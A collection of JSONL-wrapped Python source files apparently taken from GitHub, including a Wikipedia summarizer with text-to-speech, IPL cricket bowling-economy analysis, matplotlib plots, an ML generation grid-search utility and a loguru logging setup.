version\n try:\n tar_path.rename(self.playbook_path)\n except OSError:\n shutil.rmtree(str(tar_path))\n\n self.tar_download.unlink() # delete the tarball\n\n def remove(self):\n \"\"\"Remove the playbook directory\"\"\"\n if not self.playbook_path:\n raise FileNotFoundError(\"Playbook directory not found. Cannot remove.\")\n shutil.rmtree(str(self.playbook_path))\n self.playbook_path = None\n\n def playbook_exists(self):\n \"\"\"Check if playbook directory exists\"\"\"\n return os.path.isdir(self.playbook_path)\n\ndef fix_hosts_permissions(path: Path):\n try:\n os.chmod(path / \"inventory/hosts.json\", 0o600)\n except FileNotFoundError:\n pass","repo_name":"micado-scale/micado-client","sub_path":"micado/installer/ansible/playbook.py","file_name":"playbook.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"36815188794","text":"import sys\r\n\r\ndef remove_repetitions(text):\r\n if len(text) == 0: return text\r\n result = [text[0]]\r\n for char in text[1:]:\r\n if char != result[-1]:\r\n result.append(char)\r\n return ''.join(result)\r\n\r\ndef main():\r\n test_cases = open(sys.argv[1], 'r')\r\n for test in test_cases:\r\n test = test.strip()\r\n if len(test) == 0:\r\n continue\r\n print(remove_repetitions(test))\r\n test_cases.close()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n'''import sys\r\ntest_cases = open(sys.argv[1], 'r')\r\nfor test in test_cases:\r\n # ignore test if it is an empty line\r\n # 'test' represents the test case, do something with it\r\n # ...\r\n # ...\r\n #test=test.split()\r\n test = test.strip()\r\n result=[test[0]]\r\n #print result\r\n for char in test[1:]:\r\n #print char\r\n if char != result[-1]:\r\n result.append(char)\r\n print ''.join(result)\r\ntest_cases.close()\r\n'''","repo_name":"Kavit900/codeeval","sub_path":"0-easy/without-repetitions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6600248063","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 15 18:01:36 2020\r\n\r\n@author: hawk\r\n\r\nTODO:\r\n ~fix summary bug that summarizes somthing else\r\n ~do a try except for the summary function ( https://stackoverflow.com/questions/25946692/wikipedia-disambiguation-error ) \r\n \r\n pass content into the summerize function\r\n \r\n \r\n \r\n\"\"\"\r\n # summarizer libraries \r\nimport sumy\r\nfrom sumy.parsers.plaintext import PlaintextParser\r\nfrom sumy.nlp.tokenizers import Tokenizer\r\nfrom sumy.summarizers.lex_rank import LexRankSummarizer\r\n\r\nimport keyboard\r\n\r\n\r\nimport wikipedia\r\nimport random\r\nimport pyttsx3\r\nimport sys\r\nimport json\r\nimport time\r\n\r\n\r\n# lists of People\r\n\r\n#line function\r\ndef line():\r\n line = print(\"_\" * 100, \"\\n\")\r\n\r\n#this is the main function where the program starts\r\ndef main(): \r\n #start of output\r\n #make a line\r\n line()\r\n \r\n #asking user for input\r\n opt1 = input(\"\"\"what do you what to look up?\r\n \r\nJust start typing to lookup somthing.\r\n\r\nor type \"im feeling lucky\"\r\n\r\n\"\"\" )\r\n\r\n #print a line\r\n #make opt1 lowwer case\r\n opt1 = opt1.lower()\r\n \r\n \r\n #logic\r\n if opt1 == \"im feeling lucky\":\r\n ImFeelingLucky()\r\n else:\r\n wikiSearch = Search(opt1)\r\n print(wikiSearch)\r\n logic(wikiSearch, opt1)\r\n \r\n \r\n \r\n\r\ndef RNG(Low, High):\r\n \r\n RNG = random.randint(Low, High)\r\n return RNG\r\n\r\ndef logic(opt1, objectBeingSearched):\r\n #pages\r\n line()\r\n wikiPages = opt1 #Pages(opt1)\r\n print(\"*** Page ***\")\r\n print(\"page \", wikiPages)\r\n \r\n #content\r\n content = Content(opt1)\r\n \r\n # summary \r\n summySummary = summerize_the_research(content, objectBeingSearched)\r\n print(summySummary, \"test\")\r\n TTS(summySummary)\r\n \r\n opt2 = input(\"do you want references? (y/n) \")\r\n opt2.lower() \r\n \r\n if opt2 == \"y\":\r\n references(opt1)\r\n \r\n \r\n \r\n\r\n\r\ndef DisambiguationErrorView(Input, errInput):\r\n line()\r\n # print(\"\\nThere was an error with\" , Input, \"\\n\")\r\n print(Input, \"is ambiguous and could mean a lot. What did you mean?\")\r\n #making the errInput a list\r\n errOptions = errInput.options\r\n #incrmenting a number to display to user\r\n incrmenting = 1\r\n \r\n #this sleeps for X seconds\r\n #time needs to be imported to work\r\n time.sleep(3)\r\n #This for loop prints the errOptions list one at a time\r\n for x in errOptions:\r\n print(incrmenting, x)\r\n incrmenting += 1\r\n \r\n #ask the user what they want to look up.\r\n #if they dont use a number try again\r\n \r\n while True:\r\n try:\r\n UserInput = int(input(\" 'Use the number to select' \"))\r\n break\r\n except ValueError:\r\n print(\"Please use the number\")\r\n continue\r\n #pulling what the user wants from the list\r\n #we - 1 because computers start at 0\r\n #EX: user wants displayed index 3 that would be 2 in the list\r\n userChoice = errOptions[UserInput-1]\r\n wikiPages = Pages(userChoice)\r\n return wikiPages\r\n\r\n\r\n\r\ndef Summaryold(Input):\r\n #getting a summary from the input\r\n try:\r\n i = wikipedia.summary(Input, sentences=0, chars=0, auto_suggest=False, redirect=True)\r\n return i\r\n \r\n except wikipedia.DisambiguationError as err:\r\n # line()\r\n # print(\"\\nThere was an error summarizing\" , Input)\r\n # print(\"\\n\", Input, \" is ambiguous and could mean a lot. What did you mean?\")\r\n # print(\"\\n\\nError\", e)\r\n \r\n DisambiguationErrorView(Input, err)\r\n \r\n # incrmenting = 1\r\n # errOptions = err.options\r\n \r\n # for x in errOptions:\r\n # print(incrmenting, x)\r\n # incrmenting += 1\r\n \r\n \r\n\r\n\r\n\r\n\r\ndef Pages(Input):\r\n #getting a page from the input\r\n try:\r\n i = wikipedia.page(Input, auto_suggest=False)\r\n return i\r\n except wikipedia.DisambiguationError as e:\r\n #calling the line function to draw a line\r\n line()\r\n i = DisambiguationErrorView(Input, e)\r\n return i\r\n\r\ndef references(Input):\r\n #geting a referance\r\n i = Input.references()\r\n return i\r\n\r\ndef Content(Input):\r\n #getting content\r\n i = Input.content\r\n return i\r\n\r\ndef Search(Input):\r\n \r\n #search function\r\n wikiSearch = wikipedia.search(Input) \r\n #increment i\r\n i = 1\r\n #print the list to the user\r\n for y in wikiSearch:\r\n print(i, y)\r\n i += 1\r\n \r\n #ask what the user whats to look up\r\n print(\"\\nWhat to you want to search?\")\r\n \r\n #while true run loop true = no errors\r\n while True:\r\n try:\r\n x = int(input(\" 'Use the number to search' \"))\r\n break\r\n except ValueError:\r\n print(\"Please use the number\")\r\n continue\r\n\r\n \r\n #pulls what the user wants to look up\r\n #subtracts 1 because computers start counting at 0 not 1\r\n searched = wikiSearch[x-1]\r\n output = Pages(searched)\r\n \r\n \r\n #returns what the user whats to search\r\n return output\r\n\r\ndef ImFeelingLucky():\r\n #list of people\r\n People = ['Marilyn Monroe', 'Abraham Lincoln', 'Nelson Mandela', 'John F. Kennedy',\r\n 'Martin Luther King', 'Queen Elizabeth', 'Winston Churchill', 'Donald Trump',\r\n 'Bill Gates', 'Muhammad Ali', 'Mahatma Gandhi', 'Mother Teresa', 'Christopher Columbus',\r\n 'Charles Darwin', 'Elvis Presley', 'Albert Einstein']\r\n \r\n #list of places \r\n Places = ['Statue of Liberty', 'Eiffel Tower', 'Big Ben', 'Leaning Tower of Pisa',\r\n 'Colosseum', 'Empire State Building', 'Hollywood Sign', 'Golden Gate Bridge',\r\n 'Notre Dame', 'Tokyo Tower', 'London Eye', '''St. Peter's Basilica''',\r\n 'Sagrada Familia', 'Sagrada Familia', 'Great Wall of China', 'Sydney Opera House']\r\n \r\n \r\n ListPicker = RNG(0,2)\r\n \r\n # print(ListPicker)\r\n try:\r\n if ListPicker == 0:\r\n listLen = len(People)\r\n I = RNG(0, listLen)\r\n summ = People[I]\r\n logic(summ)\r\n # print(summ + \"\\n\")\r\n # print(wikipedia.summary(summ))\r\n # TTS(wikipedia.summary(summ))\r\n \r\n elif ListPicker == 1:\r\n listLen = len(Places)\r\n I = RNG(0, listLen)\r\n summ = Places[I]\r\n logic(summ)\r\n # print(summ + \"\\n\")\r\n # print(wikipedia.summary(summ))\r\n # TTS(wikipedia.summary(summ))\r\n \r\n elif ListPicker == 2:\r\n print(\" \")\r\n i = wikipedia.random()\r\n line()\r\n print(i, \"\\n\")\r\n logic(i)\r\n \r\n \r\n except KeyboardInterrupt:\r\n # quit\r\n sys.exit()\r\n\r\n\r\n\r\ndef openTextFile():\r\n # with open(\"wiki.txt\", \"r+\") as a\r\n with open('data.txt', 'a') as f:\r\n return f\r\n \r\n\r\n\r\n\r\ndef TTSSettings():\r\n \r\n engine = pyttsx3.init() # object creation\r\n \r\n \"\"\" RATE\"\"\"\r\n rate = engine.getProperty('rate') # getting details of current speaking rate\r\n print (rate) #printing current voice rate\r\n engine.setProperty('rate', 125) # setting up new voice rate\r\n \r\n \r\n \"\"\"VOLUME\"\"\"\r\n volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\r\n print (volume) #printing current volume level\r\n engine.setProperty('volume',1.0) # setting up volume level between 0 and 1\r\n \r\n \"\"\"VOICE\"\"\"\r\n voices = engine.getProperty('voices') #getting details of current voice\r\n #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male\r\n engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female\r\n \r\n engine.say(\"Hello World!\")\r\n engine.say('My current speaking rate is ' + str(rate))\r\n engine.runAndWait()\r\n engine.stop()\r\n \r\n \"\"\"Saving Voice to a file\"\"\"\r\n # On linux make sure that 'espeak' and 'ffmpeg' are installed\r\n engine.save_to_file('Hello World', 'test.mp3')\r\n engine.runAndWait()\r\n\r\n#TTS Code\r\ndef TTS(Input):\r\n #Starting the lib\r\n engine = pyttsx3.init()\r\n try:\r\n #computer says Input\r\n engine.say(Input)\r\n engine.runAndWait()\r\n except keyboard.is_pressed: \r\n print(\"ctrl was pressed\")\r\n engine.stop()\r\n sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\ndef WriteToFile(InputStr):\r\n with open(\"data.txt\", \"a\") as data:\r\n InputStr.write()\r\n data.close()\r\n \r\n f = open(\"demofile2.txt\", \"a\")\r\n f.write(\"Now the file has more content!\")\r\n f.close()\r\n\r\ndef ReadFromFile(fileName):\r\n \r\n with open(str(fileName), \"r\") as data:\r\n readData = data.read()\r\n return readData\r\n\r\ndef summerize_the_research(dataToSumm, objectBeingSummed):\r\n #dataToSumm is the data passes in to summarize\r\n \r\n # where the summerizing happens\r\n parser = PlaintextParser.from_string(dataToSumm, Tokenizer(\"english\"))\r\n # print(\"\\n\\n\\t\\t *** Summerize the above info ***\\n\\n\")\r\n #which summ do we want summy to use\r\n # use lexrank - one algorithum to summ data\r\n summarizer = LexRankSummarizer()\r\n #how many sentences do we want to summ\r\n number_of_Sentances = 4\r\n #this is there the summerizer does the work for you.\r\n summary = summarizer(parser.document, number_of_Sentances)\r\n \r\n # print out our resault\r\n print(\"\\n\\n\\t\\t *** Summarized \", objectBeingSummed, \" ***\\n\\n \" )\r\n for sentence in summary:\r\n print(sentence)\r\n \r\n return summary \r\n \r\n #print summ to file\r\n # ExportFile = open(\"sumData.txt\", \"w\")\r\n \r\n # return ExportFile.write(summary)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''check if we have a main function if we do run it. '''\r\n \r\n #x = Pages(\"lams\")\r\n #logic(x) \r\n \r\n main()\r\n \r\n\r\n","repo_name":"faychicken2/Wikipedia_Summerizer","sub_path":"TTSsummary3.py","file_name":"TTSsummary3.py","file_ext":"py","file_size_in_byte":9993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70499468112","text":"import matplotlib.pyplot as plt\r\n\r\nStudentName = ['Vraj','Vishwa',\"Vansh\",'Siya'] # x-axis values\r\n\r\nTotalMarks = [200,300,500,400] #Y-axis values\r\n\r\nplt. bar (StudentName, TotalMarks, color='b',width=[0.8,0.6,0.5,0.7])\r\n\r\n## Plotting graph with same color but diff widths by giving the width\r\n\r\n#sequence as list in the arqument\r\n\r\nplt. xlabel(\"StudentName\") # Giving Title to x-axis\r\n\r\nplt. ylabel(\"TotalMarks\") # Giving Title to y-axis\r\n\r\nplt. title ('Bar Plot With Same Color But Different Widths') # Giving Title to Graph\r\n\r\nplt. show() # function to show the plot","repo_name":"Vraj08/MatplotLIb","sub_path":"BarPlot3.py","file_name":"BarPlot3.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12261054478","text":"'''Importing pyplot module of matplotlib library'''\n\nimport matplotlib.pyplot as plt\n\n\ndef start_and_end_match_ids(matches):\n \"\"\"Compute starting match id and ending match id from matches.csv data,\n on the basis of season 2015 to use into deliveries.csv data\n\n :param matches : list of dictionaries of matches.csv data\\n\n :return start_id : int start match id of matches played in 2015\\n\n :return end_id : int end match id of matches played in 2015\n \"\"\"\n start_ids = 10000\n end_ids = -10000\n for match in matches:\n if match['season'] == '2015':\n if int(match['id']) < start_ids:\n start_ids = int(match['id'])\n\n if int(match['id']) > end_ids:\n end_ids = int(match['id'])\n return start_ids, end_ids\n\n\ndef top_economical_bowlers(deliveries, start_id, end_id):\n \"\"\"Compute total runs conceded by each bowler and total deliveries by\n each bowler then top economical bowlers\n\n :param deliveries : list of dictionaries of deliveries.csv data\\n\n :param start_id : int start match id of matches played in 2015\\n\n :param end_id : int end match id of matches played in 2015\\n\n :return top_economy_bowlers : dictionary of bowlers having top economy\n \"\"\"\n total_runs_per_bowler, total_deliveries_per_bowler = {}, {}\n for delivery in deliveries:\n if start_id <= int(delivery['match_id']) <= end_id:\n if delivery['bowler'] not in total_runs_per_bowler:\n if int(delivery['is_super_over']) == 0:\n total_runs_per_bowler[delivery['bowler']] = (\n int(delivery['total_runs']) - (int(delivery['bye_runs']) + int(delivery['legbye_runs'])))\n if int(delivery['noball_runs']) != 0 or int(delivery['wide_runs']) != 0 or int(delivery['is_super_over']) != 0:\n total_deliveries_per_bowler[delivery['bowler']] = 0\n else:\n total_deliveries_per_bowler[delivery['bowler']] = 1\n else:\n if int(delivery['is_super_over']) == 0:\n total_runs_per_bowler[delivery['bowler']] += (\n int(delivery['total_runs']) - (int(delivery['bye_runs']) + int(delivery['legbye_runs'])))\n if int(delivery['noball_runs']) != 0 or int(delivery['wide_runs']) != 0 or int(delivery['is_super_over']) != 0:\n total_deliveries_per_bowler[delivery['bowler']] += 0\n else:\n total_deliveries_per_bowler[delivery['bowler']] += 1\n\n total_economy_per_bowler = {}\n for bowler in total_runs_per_bowler:\n total_economy_per_bowler[float('%.2f' % (\n (total_runs_per_bowler[bowler] / total_deliveries_per_bowler[bowler])*6))] = bowler\n\n total_economy_per_bowler_sorted = {}\n for economy in sorted(total_economy_per_bowler.keys()):\n total_economy_per_bowler_sorted[economy] = total_economy_per_bowler[economy]\n\n top_economy_bowlers, limit_count = {}, 0\n for delivery in total_economy_per_bowler_sorted:\n if limit_count == 10:\n break\n top_economy_bowlers[delivery] = total_economy_per_bowler_sorted[delivery]\n limit_count += 1\n return top_economy_bowlers\n\n\ndef plot_top_economical_bowlers(top_economy_bowler):\n \"\"\"plot horizontal bar chart for top economical bowlers\n\n :param top_economy_bowlers : dictionary of bowlers having top economy\n \"\"\"\n bowlers = list(top_economy_bowler.values())\n economy = list(top_economy_bowler.keys())\n plt.barh(bowlers, economy, color=\"#6c3376\",\n edgecolor=\"#409240\", linewidth=1)\n plt.xlabel('Economy rates')\n plt.ylabel('Bowler')\n plt.title('Top economical bowlers 2015')\n plt.show()\n\n\ndef compute_and_plot_top_economical_bowlers(matches, deliveries):\n \"\"\"Handle all the function calls here\n\n :param matches : list of dictionaries of matches.csv data\\n\n :param deliveries : list of dictionaries of deliveries.csv data\n \"\"\"\n start_id, end_id = start_and_end_match_ids(matches)\n top_economy_bowlers = top_economical_bowlers(deliveries, start_id, end_id)\n plot_top_economical_bowlers(top_economy_bowlers)\n","repo_name":"SuryakantKumar/ipl-data-project","sub_path":"ipl_analytics/csv/top_economical_bowlers_2015.py","file_name":"top_economical_bowlers_2015.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"35783404399","text":"from ray import air\nfrom ray import tune\n\nfrom torch.utils.data import DataLoader\nimport pandas as pd\nimport torch\nimport sys\nfrom os import path\n\nfrom transformers import AutoTokenizer, AutoModel, DataCollatorForSeq2Seq, get_linear_schedule_with_warmup\nfrom datasets import load_metric\n\nfrom generative_model import GenerativeModel, train, test, validate\n\nfrom custom_loss import compute_match_score\n\nsys.path.insert(1, '../')\nfrom data_handler import tokenization\n\nsys.path.insert(1, '../kp_match')\nfrom siamese_network import SiameseNetwork\n\ndef concat_tag(df, attribute):\n \"\"\" Concatenates \"summarize:\" tag to a\n column in a dataframe\n Parameters\n ----------\n df: pd.DataFrame\n DataFrame\n attribute: string\n name of column\n Returns\n -------\n df: pd.DataFrame\n Modified dataframe \n \"\"\"\n df[attribute] = df[attribute].apply(lambda x : \"summarize: \"+x)\n return df\n\ndef decode_data(pred, exp, tokenizer):\n \"\"\" Uses the tokenizer to decoded the predicted sentence\n and the expected sentence\n Parameters\n ----------\n pred: array-like\n Predicted tokens\n exp: array-like\n Target tokens\n tokenizer: Tokenizer object\n Tokenizer to perform decoding\n Returns\n -------\n dec_pred: string\n Predicted sentence\n dec_exp: string\n Target sentence\n \"\"\"\n \n \"\"\"\n If the inputs are tensors they must be converted to CPU\n numpy arrays of Integers\n \"\"\"\n if torch.is_tensor(pred):\n pred = pred.type(torch.IntTensor).cpu().data.numpy()\n if torch.is_tensor(exp):\n exp = exp.type(torch.IntTensor).cpu().data.numpy()\n \n # Decode predictions and labels\n dec_pred = tokenizer.batch_decode(pred, skip_special_tokens=True, clean_up_tokenization_spaces=True)\n dec_exp = tokenizer.batch_decode(exp, skip_special_tokens=True, clean_up_tokenization_spaces=True)\n \n return dec_pred, dec_exp\n\ndef compute_metrics(predicted, expected, metrics):\n \"\"\" Compute selected metrics given predictions and targets\n Parameters\n ----------\n predicted: array-like\n Predicted tokens of the model\n expected: array-like\n Target tokens\n metrics: array of strings\n Name of metrics to compute\n Returns\n -------\n metric_results : dict\n For every selected metric, stores the result of the\n computation\n \"\"\"\n \n metric_results = {}\n \n if \"rouge\" in metrics:\n metric = load_metric(\"rouge\")\n res = metric.compute(predictions = predicted, references = expected) \n \n keys_vec = ['precision', 'recall', 'fmeasure']\n metric_results['rouge'] = {}\n \n \"\"\"\n For every type of rouge metric (rouge-1, rouge-2, etc.)\n save precision, recall and fmeasure scores in a dict\n \n Dict example:\n {'rouge': \n {\n 'rouge1': {'precision': 0.19, 'recall': 0.20, 'fmeasure': 0.18}, \n 'rouge2': {'precision': 0.10, 'recall': 0.10, 'fmeasure': 0.10}, \n 'rougeL': {'precision': 0.18, 'recall': 0.19, 'fmeasure': 0.17}, \n 'rougeLsum': {'precision': 0.18, 'recall': 0.19, 'fmeasure': 0.17}\n }\n }\n \"\"\"\n for k,v in res.items():\n metric_results['rouge'][k] = {}\n for metric in keys_vec:\n metric_results['rouge'][k][metric] = getattr(v.mid, metric)\n \n return metric_results\n\n\ndef tokenization_target(sentences, tokenizer, max_length=512):\n \"\"\" Tokenize target sentences\n Parameters\n ----------\n sentences: array of strings\n Sentences to be tokenized\n tokenizer: Tokenizer object\n Tokenizer to perform tokenization\n max_length: int, default='512'\n Maximum length of tokenization\n Returns\n -------\n input_ids: array-like\n Input IDs of tokenized sentences\n attention_masks: array-like\n Attention masks of tokenized sentences\n labels: array-like\n Target tokens of data\n \"\"\"\n \n input_ids = []\n attention_masks = []\n labels = []\n\n \"\"\"\n Tokenize as target to perform teacher forcing\n \"\"\"\n with tokenizer.as_target_tokenizer():\n for sent in sentences:\n encoding = tokenizer(sent, max_length = max_length, \n return_attention_mask = True,\n pad_to_max_length = True,\n truncation=True\n )\n\n \"\"\"\n Targets are input IDs shifted by one \n (starting from the second position)\n \"\"\"\n labels.append(encoding[\"input_ids\"][1:])\n\n # Store encoding input ID and attention mask\n \n input_ids.append(encoding['input_ids'][:-1])\n\n attention_masks.append(encoding['attention_mask'][:-1])\n\n # Convert the lists into tensors.\n input_ids = torch.as_tensor(input_ids)\n attention_masks = torch.as_tensor(attention_masks)\n labels = torch.as_tensor(labels)\n \n return input_ids, attention_masks, labels\n \n \ndef tokenize_df_gen(df, tokenizer, max_length=512, key_points_on=True):\n \"\"\" Tokenize a dataframe of sentences\n for a generation task\n Parameters\n ----------\n df: pd.Dataframe\n Data to be tokenized\n tokenizer: Tokenizer object\n Tokenizer to perform tokenization\n max_length: int, default='512'\n Maximum length of tokenization\n key_points_on: bool, default=True\n Changes structure of output dict,\n depends on the presence of key_points (True)\n or their absence (False)\n Returns\n -------\n tokenized: array-like\n List of dictionaries containing \n each pair of tokenized argument \n and eventual key-point\n \"\"\"\n \n input_id_args, attention_masks_args = tokenization(df['argument'], tokenizer, max_length=max_length)\n if key_points_on:\n input_id_kps, attention_masks_kps, labels = tokenization_target(df['key_point'], tokenizer, max_length=max_length)\n\n tokenized = [ {\n 'input_ids': input_id_args[i],\n 'attention_mask' : attention_masks_args[i], \n 'decoder_input_ids': input_id_kps[i],\n 'decoder_attention_mask' : attention_masks_kps[i],\n 'labels': labels[i]\n } for i in range(len(input_id_args)) ]\n else:\n tokenized = [ {\n 'input_ids': input_id_args[i],\n 'attention_mask' : attention_masks_args[i]\n } for i in range(len(input_id_args)) ]\n\n return tokenized\n\n\ndef grid_search(train_data, val_data, model_type, params, metrics, device):\n \"\"\" Perform a grid search, given a set of configurations of hyper-parameters.\n Parameters\n ----------\n train_data: pd.DataFrame\n Data on which training is performed\n val_data: pd.DataFrame\n Data on which validation is performed\n model_type: string\n Name of model to be trained\n params: dict\n Configurations of hyper-parameters to test\n metrics: array of strings\n Name of metrics to compute\n device: torch device\n Selected device on which to perform the grid search \n (usually a GPU)\n \"\"\"\n \n # Add data to configuration\n params['train_data'] = train_data\n params['val_data'] = val_data\n params['model_type'] = model_type\n \n params['device'] = device\n \n params['metrics'] = metrics\n \n # Set logs to be shown on the Command Line Interface every 30 seconds\n reporter = tune.CLIReporter(max_report_frequency=30)\n \n # Starts grid search using RayTune\n tuner = tune.Tuner(tune.with_resources(trainable,\n {\"cpu\":2, \"gpu\":1}), \n param_space = params, \n tune_config = tune.tune_config.TuneConfig(reuse_actors = False),\n run_config=air.RunConfig(name='gen_'+params['optimizer'], verbose=1, progress_reporter=reporter))\n results = tuner.fit()\n \n # Get a dataframe for the last reported results of all of the trials \n df = results.get_dataframe()\n \n \ndef trainable(config_dict):\n \"\"\" Performs training on a single configuration of hyper-parameters.\n The results are stored in a .csv file.\n Parameters\n ----------\n config_dict: dict\n Data needed to perform training and validation\n (data, hyper-parameters, metrics, etc.)\n \"\"\"\n \n # Empty GPU cache\n torch.cuda.empty_cache()\n \n # Load Generative model with the defined model_type and move it to the desired device\n model = GenerativeModel(config_dict['model_type'])\n model.to(config_dict['device'])\n \n #Tokenize data (both training and validation)\n tokenizer = config_dict['tokenizer']\n config_dict.pop('tokenizer')\n tokenized_tr = tokenize_df_gen(config_dict['train_data'], tokenizer, max_length=config_dict['max_length'])\n tokenized_val = tokenize_df_gen(config_dict['val_data'], tokenizer, max_length=config_dict['max_length'])\n \n # Remove useless data\n config_dict.pop('train_data')\n config_dict.pop('val_data')\n \n # Data is set for seq2seq tasks\n seq2seq_data_collator = DataCollatorForSeq2Seq(tokenizer, model=model, padding=True, max_length=config_dict['max_length'])\n \n \"\"\"\n Create DataLoader object for training data to feed it to the model.\n The data is shuffled at each epoch, it is divided in mini-batches with the batch size selected\n in the hyper-parameters configuration and it is pinned to memory for efficiency.\n Additionally, it uses the pre-defined seq2seq collator\n \"\"\"\n train_loader = DataLoader(\n tokenized_tr, \n batch_size=config_dict['batch_size'], \n collate_fn=seq2seq_data_collator, \n shuffle=True,\n pin_memory=True\n )\n \n optimizer=config_dict['optimizer']\n \n # Load the selected optimizer with the given hyper-parameters\n if(optimizer == 'adamW'):\n optimizer= torch.optim.AdamW(model.parameters(),\n lr = config_dict['lr'], \n eps = config_dict['eps'],\n weight_decay = config_dict['weight_decay']\n )\n elif (optimizer == 'sgd'):\n optimizer = torch.optim.SGD(model.parameters(),\n lr = config_dict['lr'],\n momentum = config_dict['momentum'],\n nesterov = config_dict['nesterov']\n )\n elif (optimizer == 'adam'):\n optimizer= torch.optim.Adam(model.parameters(),\n lr = config_dict['lr'], \n eps = config_dict['eps'],\n weight_decay = config_dict['weight_decay']\n )\n \n # Total number of training steps\n total_steps = len(train_loader) * config_dict['epochs']\n \n # Scheduler for the learning rate\n scheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = config_dict['warmup_steps'],\n num_training_steps = total_steps)\n \n loss_dict = None\n # If custom loss is set\n if config_dict['match_model_type'] != 'null':\n \n # Load Siamese Network from file\n match_model = SiameseNetwork(model_type=AutoModel.from_pretrained(config_dict['match_model_type']))\n match_model.load_state_dict(torch.load(\"../../../HLTKeyPointAnalysis/kp_match/models/model_82\"))\n \n # Move the siamese network to the desired device\n match_model.to(config_dict['device'])\n \n # Load corresponding tokenizer\n match_tokenizer = AutoTokenizer.from_pretrained(config_dict['match_model_type'])\n \n # Save custom loss configuration in dict\n loss_dict = {'gen_tokenizer': tokenizer, 'match_tokenizer': match_tokenizer, 'match_model': match_model, 'mode': config_dict['mode'], 'loss_function': compute_match_score}\n \n # Train model\n train_res = train(model, config_dict['device'], train_loader, optimizer, config_dict['epochs'], loss_dict, scheduler, config_dict['max_length'], verbose=True)\n \n # Evaluation of train predictions\n config_dict['train_metrics'] = [None] * len(train_res['predicted'])\n \n # For every epoch, compute selected metrics and store them\n for i, elem in enumerate(train_res['predicted']):\n dec_pred, dec_exp = decode_data(elem, train_res['labels'][i], tokenizer)\n config_dict['train_metrics'][i] = compute_metrics(dec_pred, dec_exp, config_dict['metrics'])\n \n \"\"\"\n Create DataLoader object for validation data, it is pinned to memory for efficiency, its batch size is set to 1.\n Like for the training dataset, the seq2seq collator is used\n \"\"\"\n val_loader = DataLoader(\n tokenized_val, \n batch_size=1,\n collate_fn=seq2seq_data_collator, \n shuffle=True,\n pin_memory=True\n )\n \n # Perform evaluation\n val_res = validate(model, config_dict['device'], val_loader, max_length=config_dict['max_length'])\n \n # Compute metrics\n config_dict['validation_metrics'] = [None] * len(val_res['predicted'])\n dec_pred, dec_exp = decode_data(val_res['predicted'], val_res['labels'], tokenizer)\n config_dict['validation_metrics'] = compute_metrics(dec_pred, dec_exp, config_dict['metrics'])\n \n # Remove useless data\n config_dict.pop('device')\n config_dict.pop('metrics')\n \n # Create a pd.DataFrame of the config with its results\n for key, value in config_dict.items():\n config_dict[key] = [config_dict[key]]\n \n df=pd.DataFrame(config_dict)\n \n # Store results (if file already exists, append the results otherwise create the .csv file)\n df.to_csv('../../../HLTKeyPointAnalysis/task2_grid_results.csv', mode='a', sep='#', index=False, header=False if path.exists(\"../../../HLTKeyPointAnalysis/task2_grid_results.csv\") else True)\n \n print(config_dict['validation_metrics'])\n","repo_name":"Jek9884/HLTKeyPointAnalysis","sub_path":"kp_generation/gen_utils.py","file_name":"gen_utils.py","file_ext":"py","file_size_in_byte":14033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31761862395","text":"import torch\nfrom torch import nn\nfrom torch.nn import init\n\n\nnet = nn.Sequential(\n\tnn.Linear(4, 3), \n\tnn.ReLU(), \n\tnn.Linear(3, 1)) # pytorch已进行默认初始化\n\n\n# X = torch.rand(2, 4)\n# Y = net(X).sum()\n# print(Y)\n\n# 访问模型参数\nprint(type(net.named_parameters()))\nfor name, param in net.named_parameters():\n\tprint(name, param.size())\n\n# 访问第 0 层的参数\nprint('---')\nfor name, param in net[0].named_parameters():\n\tprint(name, param.size(), type(param))\n\nprint(\"---init---\")\n# 初始化模型参数\nfor name, param in net.named_parameters():\n\tif 'weight' in name:\n\t\tinit.normal_(param, mean=0, std=0.01)\n\t\tprint(name, param.data)\n","repo_name":"MoCuishle28/deep-learning-practice","sub_path":"nn-learn/model-init-share-visit.py","file_name":"model-init-share-visit.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34419181583","text":"import logging\nimport sys\n\nfrom loguru import logger\n\n\nclass InterceptHandler(logging.Handler):\n \"\"\"\n A handler to push standard logging messages to loguru.\n\n This is directly from the loguru docs.\n \"\"\"\n def emit(self, record):\n # Get corresponding Loguru level if it exists\n try:\n level = logger.level(record.levelname).name\n except ValueError:\n level = record.levelno\n\n # Find caller from where originated the logged message\n frame, depth = logging.currentframe(), 2\n while frame.f_code.co_filename == logging.__file__:\n frame = frame.f_back\n depth += 1\n\n logger.opt(depth=depth, exception=record.exc_info).log(level, record.getMessage())\n\n\n# Push all std lib logger calls to loguru\nlogging.basicConfig(handlers=[InterceptHandler()], level=0)\n\n# Silence noisy libs\nlogging.getLogger(\"disnake\").setLevel(logging.ERROR)\nlogging.getLogger(\"asyncio\").setLevel(logging.ERROR)\n\n# Remove the default stderr sink, so we can add our own with custom formatting.\nlogger.remove()\n\n# Define logger format and add the sink.\nlogger_format = \"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {name}:{line} | {message}\"\nlogger.add(sys.stdout, format=logger_format)\nlogger.add(\"logs/tyrant_log.log\", format=logger_format, retention=\"7 days\", rotation=\"10 